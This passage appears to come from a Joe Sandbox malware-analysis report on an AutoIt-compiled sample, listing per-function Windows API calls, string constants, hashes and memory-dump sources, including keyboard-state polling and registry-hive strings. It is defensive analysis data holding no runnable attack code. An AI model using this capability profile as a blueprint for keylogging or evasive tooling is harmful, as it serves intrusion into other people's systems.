                • GetStockObject.GDI32(00000011), ref: 00C233DF
                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C233EA
                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C233F4
                Strings
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: 9bf4f988045eb6f2ab99d4252dd7bebb3e52e4be1dc9ced10216e87981d5e8d9
                • Instruction ID: db3e17b7ab77431f34c607d175b219644a26876c4c79e16482089d3ed50a26bd
                • Opcode Fuzzy Hash: 9bf4f988045eb6f2ab99d4252dd7bebb3e52e4be1dc9ced10216e87981d5e8d9
                • Instruction Fuzzy Hash: D5B13F71A10215AFEB14DF78DC85FAE7BB9EB45710F004155F915EB2A0DB74AD40CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SystemParametersInfoW.USER32 ref: 00BA259A
                • GetSystemMetrics.USER32 ref: 00BA25A2
                • SystemParametersInfoW.USER32 ref: 00BA25CD
                • GetSystemMetrics.USER32 ref: 00BA25D5
                • GetSystemMetrics.USER32 ref: 00BA25FA
                • SetRect.USER32 ref: 00BA2617
                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BA2627
                • CreateWindowExW.USER32 ref: 00BA265A
                • SetWindowLongW.USER32 ref: 00BA266E
                • GetClientRect.USER32 ref: 00BA268C
                • GetStockObject.GDI32(00000011), ref: 00BA26A8
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA26B3
                  • Part of subcall function 00BA19CD: GetCursorPos.USER32(?,?,00000000,00000000,?,00BA26C6,00000000,000000FF,?,?,?), ref: 00BA19E1
                  • Part of subcall function 00BA19CD: ScreenToClient.USER32 ref: 00BA19FE
                  • Part of subcall function 00BA19CD: GetAsyncKeyState.USER32(00000001), ref: 00BA1A23
                  • Part of subcall function 00BA19CD: GetAsyncKeyState.USER32(00000002), ref: 00BA1A3D
                • SetTimer.USER32 ref: 00BA26DA
                Strings
                Similarity
                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                • String ID: AutoIt v3 GUI
                • API String ID: 1458621304-248962490
                • Opcode ID: 11aec6c034dcb66a0624f18873bf62ab1ea94063946d6325036742b073ccb2c5
                • Instruction ID: dc740dff34102e076744635c84cc963b39d33a747c414879d044009a1e9ba48a
                • Opcode Fuzzy Hash: 11aec6c034dcb66a0624f18873bf62ab1ea94063946d6325036742b073ccb2c5
                • Instruction Fuzzy Hash: DDB18B75A0020AAFDB14DFA8DC89BAE7BF5FB48710F104269FA1AA7290D770D940CF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharUpperBuffW.USER32(?,?), ref: 00C31325
                • _wcslen.LIBCMT ref: 00C31360
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C313B3
                • _wcslen.LIBCMT ref: 00C313E9
                • _wcslen.LIBCMT ref: 00C31465
                • _wcslen.LIBCMT ref: 00C314E0
                  • Part of subcall function 00BBFD60: _wcslen.LIBCMT ref: 00BBFD6B
                  • Part of subcall function 00C03478: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C0348A
                Strings
                Similarity
                • API ID: _wcslen$MessageSend$BuffCharUpper
                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                • API String ID: 1103490817-4258414348
                • Opcode ID: af5af721e44e3b5cb2ec62fd1d75fab3903e48ebb94c808ef4258d79f73b6d9e
                • Instruction ID: 67ed6cac0460fd34d4ac527b8714f144ebdf707ccd4d0ed96a611a256479f55e
                • Opcode Fuzzy Hash: af5af721e44e3b5cb2ec62fd1d75fab3903e48ebb94c808ef4258d79f73b6d9e
                • Instruction Fuzzy Hash: A8E1CF712183419FCB10DF29C49186AB7E1FF99314F18499DF8A69B7A2DB30EE45CB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                • API String ID: 1256254125-909552448
                • Opcode ID: 1b07ca52933494e102e05a4d4ddf55b034b43f03e9f0747f274165a6290bf554
                • Instruction ID: 30d101448f7fb4514885a5d07acd430ae9ed800d75214a0205ab389c8fc22cc8
                • Opcode Fuzzy Hash: 1b07ca52933494e102e05a4d4ddf55b034b43f03e9f0747f274165a6290bf554
                • Instruction Fuzzy Hash: D9711672A005368BCB20EE7CED50ABE33E1AB71754B200568F8779B694EA74DE448390
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharLowerBuffW.USER32(?,?), ref: 00C14852
                • _wcslen.LIBCMT ref: 00C1485D
                • _wcslen.LIBCMT ref: 00C148B4
                • _wcslen.LIBCMT ref: 00C148F2
                • GetDriveTypeW.KERNEL32(?), ref: 00C14930
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C14978
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C149B3
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C149E1
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: SendString_wcslen$BuffCharDriveLowerType
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1839972693-4113822522
                • Opcode ID: bd5de8b33dd857155c9923ecdaa6e42ddf3dfaf7dbd921a8f46bc44069f2734a
                • Instruction ID: cb821200f028042bafae60e269692e84893db62206bd8016a6a3d272e647b077
                • Opcode Fuzzy Hash: bd5de8b33dd857155c9923ecdaa6e42ddf3dfaf7dbd921a8f46bc44069f2734a
                • Instruction Fuzzy Hash: D871F5715083019FC714DF24C8909ABB7E4FF96768F00496CF8A5972A1EB30DE85DB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadIconW.USER32 ref: 00C062BD
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C062CF
                • SetWindowTextW.USER32(?,?), ref: 00C062E6
                • GetDlgItem.USER32 ref: 00C062FB
                • SetWindowTextW.USER32(00000000,?), ref: 00C06301
                • GetDlgItem.USER32 ref: 00C06311
                • SetWindowTextW.USER32(00000000,?), ref: 00C06317
                • SendDlgItemMessageW.USER32 ref: 00C06338
                • SendDlgItemMessageW.USER32 ref: 00C06352
                • GetWindowRect.USER32 ref: 00C0635B
                • _wcslen.LIBCMT ref: 00C063C2
                • SetWindowTextW.USER32(?,?), ref: 00C063FE
                • GetDesktopWindow.USER32 ref: 00C06404
                • GetWindowRect.USER32 ref: 00C0640B
                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C06462
                • GetClientRect.USER32 ref: 00C0646F
                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C06494
                • SetTimer.USER32 ref: 00C064BE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                • String ID:
                • API String ID: 895679908-0
                • Opcode ID: 11eaa9d6cd253cbc6d7ce4603b93c4b25ad2f409acd7a2e3dd584f5e96b31bc2
                • Instruction ID: 91e67420951022a7bb800e243eda499058e213d361c9f43643688cb8f02371c2
                • Opcode Fuzzy Hash: 11eaa9d6cd253cbc6d7ce4603b93c4b25ad2f409acd7a2e3dd584f5e96b31bc2
                • Instruction Fuzzy Hash: 10718B31900705AFDB20DFA9DE46BAEBBF5FF48705F100928E196A22E0D775EA54CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 00C20784
                • LoadCursorW.USER32(00000000,00007F8A), ref: 00C2078F
                • LoadCursorW.USER32(00000000,00007F00), ref: 00C2079A
                • LoadCursorW.USER32(00000000,00007F03), ref: 00C207A5
                • LoadCursorW.USER32(00000000,00007F8B), ref: 00C207B0
                • LoadCursorW.USER32(00000000,00007F01), ref: 00C207BB
                • LoadCursorW.USER32(00000000,00007F81), ref: 00C207C6
                • LoadCursorW.USER32(00000000,00007F88), ref: 00C207D1
                • LoadCursorW.USER32(00000000,00007F80), ref: 00C207DC
                • LoadCursorW.USER32(00000000,00007F86), ref: 00C207E7
                • LoadCursorW.USER32(00000000,00007F83), ref: 00C207F2
                • LoadCursorW.USER32(00000000,00007F85), ref: 00C207FD
                • LoadCursorW.USER32(00000000,00007F82), ref: 00C20808
                • LoadCursorW.USER32(00000000,00007F84), ref: 00C20813
                • LoadCursorW.USER32(00000000,00007F04), ref: 00C2081E
                • LoadCursorW.USER32(00000000,00007F02), ref: 00C20829
                • GetCursorInfo.USER32(?), ref: 00C20839
                • GetLastError.KERNEL32 ref: 00C2087B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Cursor$Load$ErrorInfoLast
                • String ID:
                • API String ID: 3215588206-0
                • Opcode ID: af26bfd826b4117cc89333c468dc4cd87707b070ed01accd93aad8c3790d49b7
                • Instruction ID: 4e831ec5a4fcc42e706d4dbc80dba83ca1ee50870a210bf14ae4b67311954625
                • Opcode Fuzzy Hash: af26bfd826b4117cc89333c468dc4cd87707b070ed01accd93aad8c3790d49b7
                • Instruction Fuzzy Hash: 594163B0E083196BDB10DFBA9C8985EBFE8FF04354B50452AE11DE7691DA78E901CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,00C3DCD0), ref: 00C24A18
                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C24A2A
                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00C3DCD0), ref: 00C24A4F
                • FreeLibrary.KERNEL32(00000000,?,00C3DCD0), ref: 00C24A9B
                • StringFromGUID2.OLE32(?,?,00000028,?,00C3DCD0), ref: 00C24B05
                • SysFreeString.OLEAUT32(00000009), ref: 00C24BBF
                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C24C25
                • SysFreeString.OLEAUT32(?), ref: 00C24C4F
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                • String ID: GetModuleHandleExW$kernel32.dll
                • API String ID: 354098117-199464113
                • Opcode ID: 43564aa7424718882befdc188a2b5c1d78e4304922ed14965357f1797ee9e5c8
                • Instruction ID: 2e6d2f50f5de6d52cacba1a0a0156d6fe1bc73d1f8803ec776fcf732f307d883
                • Opcode Fuzzy Hash: 43564aa7424718882befdc188a2b5c1d78e4304922ed14965357f1797ee9e5c8
                • Instruction Fuzzy Hash: 36127D71A00114EFDB18DF94D884EAEBBB9FF45314F258098E919AF651C731EE42CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                • String ID: ThumbnailClass
                • API String ID: 1311036022-1241985126
                • Opcode ID: 1a8cd2d1562e279a21cc477e0fb9da53260d0014c090abc03e91ec5323754ede
                • Instruction ID: 7db95ee990e5b9bbcb7b60c36932f2ab001feadd3917e286dce410a846cd7bb8
                • Opcode Fuzzy Hash: 1a8cd2d1562e279a21cc477e0fb9da53260d0014c090abc03e91ec5323754ede
                • Instruction Fuzzy Hash: A091A9711047059BDB04CF24C885BAB77A8FF84350F04846AFD9A9A0D6EB30EE85CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ItemMenu$Info$CheckCountRadioSleep
                • String ID: 0
                • API String ID: 1460738036-4108050209
                • Opcode ID: 6da26336bcf207504a50e3229dc64fe9677e8681e819bad879f678b510f4e430
                • Instruction ID: 8c55a97555c70a206a0bfa77bdf731a8506e5972740961b74484c22a63a3aa4c
                • Opcode Fuzzy Hash: 6da26336bcf207504a50e3229dc64fe9677e8681e819bad879f678b510f4e430
                • Instruction Fuzzy Hash: 7A616DB090025AABDF11CF68D8C8FAEBBA8FB05314F104215F961A32D1D734AE55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C0E3E9
                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C0E40F
                • _wcslen.LIBCMT ref: 00C0E419
                • _wcsstr.LIBVCRUNTIME ref: 00C0E469
                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C0E485
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1939486746-1459072770
                • Opcode ID: df428181b487b6ca134c328391e3aacf070c041f56d3c612206f45db6c987682
                • Instruction ID: 6b195aa2c9f6336ffafdca077c9ef5c902c2ee7ae30af843de780af8fc1d17f4
                • Opcode Fuzzy Hash: df428181b487b6ca134c328391e3aacf070c041f56d3c612206f45db6c987682
                • Instruction Fuzzy Hash: 7D4127726502047BEB10BBA49C47FBF77ECDF55310F0408A9F941A61C2EB749A01D6A5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C1469A
                • _wcslen.LIBCMT ref: 00C146C7
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C146F7
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C14718
                • RemoveDirectoryW.KERNEL32(?), ref: 00C14728
                • DeviceIoControl.KERNEL32 ref: 00C147AF
                • CloseHandle.KERNEL32(00000000), ref: 00C147BA
                • CloseHandle.KERNEL32(00000000), ref: 00C147C5
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 1149970189-3457252023
                • Opcode ID: 6ee1a27b1c35c513148e26272e418c58bf838e5da350a056d3a0e048218499e3
                • Instruction ID: 1ee61429cfbee1d66124764ecb8dbff99c13f4a184c0e668be75f29eb7c8b5b5
                • Opcode Fuzzy Hash: 6ee1a27b1c35c513148e26272e418c58bf838e5da350a056d3a0e048218499e3
                • Instruction Fuzzy Hash: C3318FB1910209ABDB219B60DC44FEF37BDEF8A754F1041A9F619960A0EB709B849B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C0F289
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0F29F
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0F2B0
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C0F2C2
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C0F2D3
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: SendString$_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 2420728520-1007645807
                • Opcode ID: 037341a487446e4d5e88e8ecc5c6e2c349a9e8d2c22bae488debf4fe2bbfade3
                • Instruction ID: 95bb9d6fa47d376aeb48955cf3885fe39d2f825b8950a34eb1a5654c0ce19aee
                • Opcode Fuzzy Hash: 037341a487446e4d5e88e8ecc5c6e2c349a9e8d2c22bae488debf4fe2bbfade3
                • Instruction Fuzzy Hash: 6711C631A5415979DB30A7A1DC8AEFF7BFCEFD2B14F0009797411A20D5EAA01E45C5B1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 00C0A8EE
                • SetKeyboardState.USER32(?), ref: 00C0A959
                • GetAsyncKeyState.USER32(000000A0), ref: 00C0A979
                • GetKeyState.USER32(000000A0), ref: 00C0A990
                • GetAsyncKeyState.USER32(000000A1), ref: 00C0A9BF
                • GetKeyState.USER32(000000A1), ref: 00C0A9D0
                • GetAsyncKeyState.USER32(00000011), ref: 00C0A9FC
                • GetKeyState.USER32(00000011), ref: 00C0AA0A
                • GetAsyncKeyState.USER32(00000012), ref: 00C0AA33
                • GetKeyState.USER32(00000012), ref: 00C0AA41
                • GetAsyncKeyState.USER32(0000005B), ref: 00C0AA6A
                • GetKeyState.USER32(0000005B), ref: 00C0AA78
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: f4454c87b0a3ad5ddef735693d840ba7a0c46afd63b84b34caaa4a851a665e93
                • Instruction ID: 565efa97568ae8d92d09b4ed00f3e5e74e1cebf858d6a5291eda36aaf11a8a83
                • Opcode Fuzzy Hash: f4454c87b0a3ad5ddef735693d840ba7a0c46afd63b84b34caaa4a851a665e93
                • Instruction Fuzzy Hash: 3551FA30A047846AFB35E7B089147EABFB49F11380F088699D5D25B1C3DA649F4CDB63
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDlgItem.USER32 ref: 00C06571
                • GetWindowRect.USER32 ref: 00C0658A
                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C065E8
                • GetDlgItem.USER32 ref: 00C065F8
                • GetWindowRect.USER32 ref: 00C0660A
                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C0665E
                • GetDlgItem.USER32 ref: 00C0666C
                • GetWindowRect.USER32 ref: 00C0667E
                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C066C0
                • GetDlgItem.USER32 ref: 00C066D3
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C066E9
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C066F6
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: ca10c3724c988f8a3e5fa5e205863e050ad833e2e4c6274ffcec8cf4ea7dea23
                • Instruction ID: 98678d25e679a6f6b5e63eb05ab037c4beb8c3ce905f70bd1138e91efe2b5d8c
                • Opcode Fuzzy Hash: ca10c3724c988f8a3e5fa5e205863e050ad833e2e4c6274ffcec8cf4ea7dea23
                • Instruction Fuzzy Hash: 9D510CB1A10215AFDB08CF68DD89BAEBBB5FB48310F108129F91AE72D4D7719E14CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA21E4: GetWindowLongW.USER32(?,000000EB), ref: 00BA21F2
                • GetSysColor.USER32(0000000F), ref: 00BA2102
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ColorLongWindow
                • String ID:
                • API String ID: 259745315-0
                • Opcode ID: 53b70480501beb38736ce3b8deb606e0652f5a2ec7b95d1b18cf6c512b82b19a
                • Instruction ID: d40149642b1662a679e98359e12b6ec33dc337b5d1617f1e1a9235b9f94d1ab2
                • Opcode Fuzzy Hash: 53b70480501beb38736ce3b8deb606e0652f5a2ec7b95d1b18cf6c512b82b19a
                • Instruction Fuzzy Hash: E4417C31204640AFDB205B2DEC89BBE3BE5EB56731F144685FAA6972E1C73199429B10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C3499A
                • CreateCompatibleDC.GDI32(00000000), ref: 00C349A1
                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C349B4
                • SelectObject.GDI32(00000000,00000000), ref: 00C349BC
                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C349C7
                • DeleteDC.GDI32(00000000), ref: 00C349D1
                • GetWindowLongW.USER32(?,000000EC), ref: 00C349DB
                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00C349F1
                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00C349FD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                • String ID: static
                • API String ID: 2559357485-2160076837
                • Opcode ID: b7147db0d3a148dc19e01837a4ef61efe188949edb1c129308d963b092d1ec34
                • Instruction ID: 2d8e415ff3560a74aecaf6492381b7ac054ffac8ea5c2c1f885d64dbc18cba33
                • Opcode Fuzzy Hash: b7147db0d3a148dc19e01837a4ef61efe188949edb1c129308d963b092d1ec34
                • Instruction Fuzzy Hash: A3316E32120215ABDF119FA4EC09FDE3BBCFF09725F110211FA6AA60A0D735E821DB54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(?), ref: 00C245B9
                • CoInitialize.OLE32(00000000), ref: 00C245E7
                • CoUninitialize.OLE32 ref: 00C245F1
                • _wcslen.LIBCMT ref: 00C2468A
                • GetRunningObjectTable.OLE32(00000000,?), ref: 00C2470E
                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C24832
                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C2486B
                • CoGetObject.OLE32(?,00000000,00C40B64,?), ref: 00C2488A
                • SetErrorMode.KERNEL32(00000000), ref: 00C2489D
                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C24921
                • VariantClear.OLEAUT32(?), ref: 00C24935
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                • String ID:
                • API String ID: 429561992-0
                • Opcode ID: 3328975c9af1e1443bdc86d6e0a155ffd302da2355d7202df3f83cddb01c81de
                • Instruction ID: 93b4ae8635291876cd041f47acc0943deb27dba98629c914ec5ffd067847e304
                • Opcode Fuzzy Hash: 3328975c9af1e1443bdc86d6e0a155ffd302da2355d7202df3f83cddb01c81de
                • Instruction Fuzzy Hash: ABC144B1608311AFC704DF28D884A2BBBE9FF89748F14495DF99A9B250DB30ED45CB52
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitialize.OLE32(00000000), ref: 00C1844D
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C184E9
                • SHGetDesktopFolder.SHELL32(?), ref: 00C184FD
                • CoCreateInstance.OLE32(00C40CD4,00000000,00000001,00C67E8C,?), ref: 00C18549
                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C185CE
                • CoTaskMemFree.OLE32(?,?), ref: 00C18626
                • SHBrowseForFolderW.SHELL32(?), ref: 00C186B1
                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C186D4
                • CoTaskMemFree.OLE32(00000000), ref: 00C186DB
                • CoTaskMemFree.OLE32(00000000), ref: 00C18730
                • CoUninitialize.OLE32 ref: 00C18736
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                • String ID:
                • API String ID: 2762341140-0
                • Opcode ID: 16e7bbf1502f1233618686f9ee8e2393f29fdc64484e068e6961c1a277aab606
                • Instruction ID: 9880b56a3d68a8e30c00775e2f9cd7ea7d8198b47b8ba1d9d5446fe16bbd092b
                • Opcode Fuzzy Hash: 16e7bbf1502f1233618686f9ee8e2393f29fdc64484e068e6961c1a277aab606
                • Instruction Fuzzy Hash: BEC11C75A04209EFCB14DFA4C884DAEBBF5FF49344B148198F51A9B261CB30EE85DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C0033F
                • SafeArrayAllocData.OLEAUT32(?), ref: 00C00398
                • VariantInit.OLEAUT32(?), ref: 00C003AA
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C003CA
                • VariantCopy.OLEAUT32(?,?), ref: 00C0041D
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C00431
                • VariantClear.OLEAUT32(?), ref: 00C00446
                • SafeArrayDestroyData.OLEAUT32(?), ref: 00C00453
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C0045C
                • VariantClear.OLEAUT32(?), ref: 00C0046E
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C00479
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: 42dddf950336e98922ba2915184944b58b79a0acc463fca54c2ba5a958a90888
                • Instruction ID: b8c980bbb1b7180ebd1fbb778f024a2403ae177fc7492911157f0c42bfee9788
                • Opcode Fuzzy Hash: 42dddf950336e98922ba2915184944b58b79a0acc463fca54c2ba5a958a90888
